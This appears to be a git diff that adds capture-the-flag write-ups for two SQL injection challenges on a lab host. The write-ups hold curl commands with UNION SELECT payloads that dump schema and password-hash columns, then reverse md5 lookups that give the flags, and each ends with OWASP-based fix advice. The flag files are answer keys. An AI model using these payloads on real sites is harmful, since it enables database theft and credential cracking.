diff options
| -rw-r--r-- | SQL injection 1/Resources/notes.md | 33 | ||||
| -rw-r--r-- | SQL injection 1/flag | 1 | ||||
| -rw-r--r-- | SQL injection 2/Resources/notes.md | 28 | ||||
| -rw-r--r-- | SQL injection 2/flag | 1 |
4 files changed, 63 insertions, 0 deletions
diff --git a/SQL injection 1/Resources/notes.md b/SQL injection 1/Resources/notes.md new file mode 100644 index 0000000..3292f86 --- /dev/null +++ b/SQL injection 1/Resources/notes.md @@ -0,0 +1,33 @@ +## Exploit + +1. At `http://10.0.2.15/?page=member` we can inject SQL. Using an empty input and we see the error `You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1` so we can assume the SQL query is shaped like `… WHERE id=<our input>` +1. Try to `SELECT` everything with a `UNION`: + ```bash + ❯ curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode 'id=5 UNION SELECT * FROM users' + … + <pre>The used SELECT statements have a different number of columns</pre> + ``` +1. From the previous output we try an increasing number of placeholders to deduce that the original query uses two columns: + ```bash + ❯ curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode 'id=5 UNION SELECT 1,2 FROM users' + ``` +1. We get a list of all columns of all tables in the database: + ```bash + ❯ curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT column_name, table_name FROM information_schema.columns" | sed 's/<pre>/\ + /g' | grep --only-matching "First name:.*" + ``` +1. After trying a bunch of them we see that `Commentaire` and `countersign` hold a clue and a hashed password: + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT Commentaire, countersign FROM users" | sed 's/<pre>/\ + /g | grep --only-matching "First name:.*" + … + First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !<br>Surname : 5ff9d0165b4f92b14994e5c685cdce28</pre><table width=50%> + ``` +1. `5ff9d0165b4f92b14994e5c685cdce28` reverse md5 lookup → "FortyTwo" → lowercase → "fortytwo" → `echo -n fortytwo | sha256sum` + +## Fix + +[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection]() + +- Don't show SQL errors on the front-end because it gives attackers clues about the database and the queries that can be used to exploit them +- Don't include untrusted, unfiltered and/or unsanitized input into a SQL query diff --git a/SQL injection 1/flag b/SQL injection 1/flag new file mode 100644 index 0000000..4916501 --- /dev/null +++ b/SQL injection 1/flag @@ -0,0 +1 @@ +f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188 diff --git a/SQL injection 2/Resources/notes.md b/SQL injection 2/Resources/notes.md new file mode 100644 index 0000000..282802f --- /dev/null +++ b/SQL injection 2/Resources/notes.md @@ -0,0 +1,28 @@ +## Exploit + +1. See **SQL injection 1**. We do the same recon, but we explore other tables than `users`. +1. This query, meant to explore the columns of the table `list_images`, does not output anything because it's not in the same table as the original query + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT title,comment FROM list_images" | sed 's/<pre>\ + /g' | grep --only-matching "First name:.*"` + ``` +1. We use an extra query to find the schema to which the `list_images` table belongs + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT table_schema,table_name FROM information_schema.columns" | sed 's/<pre>/\ + /g' | grep --only-matching ".*list_images.*" + ``` +1. From the following query we find a clue (similarly to **SQL injection 1**) + ```bash + curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT title,comment FROM Member_images.list_images" | sed 's/<pre>/\ + /g' | grep --only-matching "First name:.*" + … + First name: Hack me ?<br>Surname : If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46</pre><table width=50%> + ``` +1. `1928e8083cf461a51303633093573c46` reverse md5 lookup → `albatroz` → `echo -n albatroz | sha256sum` + +## Fix + +[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection]() + +- Don't show SQL errors on the front-end because it gives attackers clues about the database and the queries that can be used to exploit them +- Don't include untrusted, unfiltered and/or unsanitized input into a SQL query diff --git a/SQL injection 2/flag b/SQL injection 2/flag new file mode 100644 index 0000000..ed9f3f6 --- /dev/null +++ b/SQL injection 2/flag @@ -0,0 +1 @@ +10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5 |